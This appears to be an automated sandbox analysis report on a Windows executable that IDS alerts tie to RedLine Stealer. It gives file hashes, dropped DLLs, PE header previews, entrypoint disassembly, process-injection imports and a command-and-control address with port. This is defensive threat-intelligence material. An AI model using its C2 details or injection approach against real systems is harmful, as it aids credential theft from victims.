                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):841697
                                                                                                                                                                                                                                Entropy (8bit):5.484581034394053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                                                                                MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                                                                                SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                                                                                SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                                                                                SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI5602\libcrypto-1_1.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3381792
                                                                                                                                                                                                                                Entropy (8bit):6.094908167946797
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                                                MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                                                SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                                                SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                                                SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI5602\libffi-7.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32792
                                                                                                                                                                                                                                Entropy (8bit):6.372276555451265
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                                                MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                                                SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                                                SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                                                SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI5602\python38.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4183112
                                                                                                                                                                                                                                Entropy (8bit):6.420172758698049
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                                                MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                                                SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                                                SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                                                SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI5602\select.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26696
                                                                                                                                                                                                                                Entropy (8bit):6.101296746249305
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                                                MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                                                SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                                                SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                                                SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI5602\ucrtbase.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1046080
                                                                                                                                                                                                                                Entropy (8bit):6.649151787942547
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                                                MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                                                SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                                                SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                                                SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI5602\unicodedata.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1096264
                                                                                                                                                                                                                                Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                                MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                                SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                                SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                                SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\m5804Te9Uw.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):309760
                                                                                                                                                                                                                                Entropy (8bit):6.298299285988641
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:gJEAvoYumbeaLVA/HmH6iWmZx/M+VK0l//OBYJ0tYRVpG2DbY:DAvoYumb9VA/m9WmZxlVK0l/h/DbY
                                                                                                                                                                                                                                MD5:02701F8D91714C583DECDD43635FF407
                                                                                                                                                                                                                                SHA1:855B8EEFFCD217735D1BA6395BBB6647140ECCA4
                                                                                                                                                                                                                                SHA-256:41BA86941C72B5E160359E4B851251350958CA56E1D5AA897F0917EB51C5BD2E
                                                                                                                                                                                                                                SHA-512:42930C89943297413933857C8CEAC9EEC924CE3093FD78DA8F75930ABDDA540407781CAF2FE32D4E7019CBD20171485A9D6389B4C03B0600EDBAAC597577C599
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A..A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d....^g.........."......:...4.......4.........@..........................................@.................................................pr..(.......(.......L....................................................................P..X............................text....8.......:.................. ..`.rdata...#...P...$...>..............@..@.data...............................@....pdata..L............b..............@..@.rsrc...(............f..............@..@.x64.....P.......P...j..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe:Zone.Identifier

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\m5804Te9Uw.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):6.298299285988641
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                File name:m5804Te9Uw.exe
                                                                                                                                                                                                                                File size:309'760 bytes
                                                                                                                                                                                                                                MD5:02701f8d91714c583decdd43635ff407
                                                                                                                                                                                                                                SHA1:855b8eeffcd217735d1ba6395bbb6647140ecca4
                                                                                                                                                                                                                                SHA256:41ba86941c72b5e160359e4b851251350958ca56e1d5aa897f0917eb51c5bd2e
                                                                                                                                                                                                                                SHA512:42930c89943297413933857c8ceac9eec924ce3093fd78da8f75930abdda540407781caf2fe32d4e7019cbd20171485a9d6389b4c03b0600edbaac597577c599
                                                                                                                                                                                                                                SSDEEP:6144:gJEAvoYumbeaLVA/HmH6iWmZx/M+VK0l//OBYJ0tYRVpG2DbY:DAvoYumb9VA/m9WmZxlVK0l/h/DbY
                                                                                                                                                                                                                                TLSH:D6644B1B2481A2CFF3987373D014A874D4BEE87566A64EA5A120F6F7071B2C34F15EB6
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A...A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d.....^g.........."......:...4.......4.....

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x140003414
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x675EAFDB [Sun Dec 15 10:30:51 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                File Version Minor:2
                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                                                                                Import Hash:75a1ace6800a8990783719f99f2f799f

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                sub esp, 00000298h
                                                                                                                                                                                                                                call 00007F992D019461h
                                                                                                                                                                                                                                call 00007F992D01B0D4h
                                                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007F992D01B34Ah
                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                call dword ptr [00004F54h]
                                                                                                                                                                                                                                call 00007F992D01BFB8h
                                                                                                                                                                                                                                mov dword ptr [esp+30h], 00000104h
                                                                                                                                                                                                                                mov edx, dword ptr [esp+30h]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                                call 00007F992D01BBA2h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea edx, dword ptr [00003A8Ah]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                                call 00007F992D01BDC1h
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007F992D01B391h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov ecx, dword ptr [00004BCDh]
                                                                                                                                                                                                                                call 00007F992D01C0C1h
                                                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                jne 00007F992D01B355h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea ecx, dword ptr [00003A7Ah]
                                                                                                                                                                                                                                call 00007F992D01C0AEh
                                                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007F992D01B34Ah
                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                call dword ptr [00004D2Eh]
                                                                                                                                                                                                                                call 00007F992D01B152h
                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                cmp eax, 01h
                                                                                                                                                                                                                                je 00007F992D01B34Fh
                                                                                                                                                                                                                                mov ecx, 0000C350h
                                                                                                                                                                                                                                call dword ptr [00004CC7h]
                                                                                                                                                                                                                                jmp 00007F992D01B32Eh
                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                call dword ptr [00004D0Dh]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea edx, dword ptr [00003A4Eh]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                                call 00007F992D01BD5Dh
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007F992D01B37Eh
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea ecx, dword ptr [00003A51h]
                                                                                                                                                                                                                                call 00007F992D01C05Dh
                                                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007F992D01B34Ah

                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                • [C++] VS2010 build 30319
                                                                                                                                                                                                                                • [RES] VS2010 build 30319
                                                                                                                                                                                                                                • [LNK] VS2010 build 30319

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x72700x28.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x328.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x90000x24c.pdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x50000x58.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x10000x38130x3a007e722f8807e7cdb648771f5c26d6a55eFalse0.40847252155172414data5.450995440993989IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rdata0x50000x23b20x24007798eead5e2b85a3a847eae777ecdddbFalse0.4345703125SysEx File -5.401627140137092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .data0x80000x6880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .pdata0x90000x24c0x4009af6cd03af52421736d52272632f1050False0.3466796875data2.5988413543308067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0xa0000x3280x400b20114eeb22f771b9c36da6e2ac337ceFalse0.361328125data2.6200573070054105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .x640xb0000x450000x4500034bd4464de7325d293c1f576271357e4False0.4620803611865942data6.105493774834092IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_VERSION0xa0600x2c4dataEnglishUnited States0.4717514124293785

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                KERNEL32.dllGetProcAddress, GetModuleHandleA, CloseHandle, WriteProcessMemory, VirtualAllocEx, OpenProcess, GetSystemInfo, LoadLibraryA, GetVersionExW, WaitForMultipleObjects

                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-12-16T10:42:50.047397+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049717185.81.68.14780TCP
                                                                                                                                                                                                                                2024-12-16T10:42:52.717879+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049723185.81.68.14780TCP
                                                                                                                                                                                                                                2024-12-16T10:42:53.942813+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:42:53.942813+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:42:54.378137+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.1049729TCP
                                                                                                                                                                                                                                2024-12-16T10:42:59.423340+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:42:59.862854+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.1049729TCP
                                                                                                                                                                                                                                2024-12-16T10:43:00.138154+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:00.617945+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:01.059974+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:01.497396+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:01.979247+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:02.636828+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:03.246601+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:03.269302+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:03.706057+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:04.144847+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
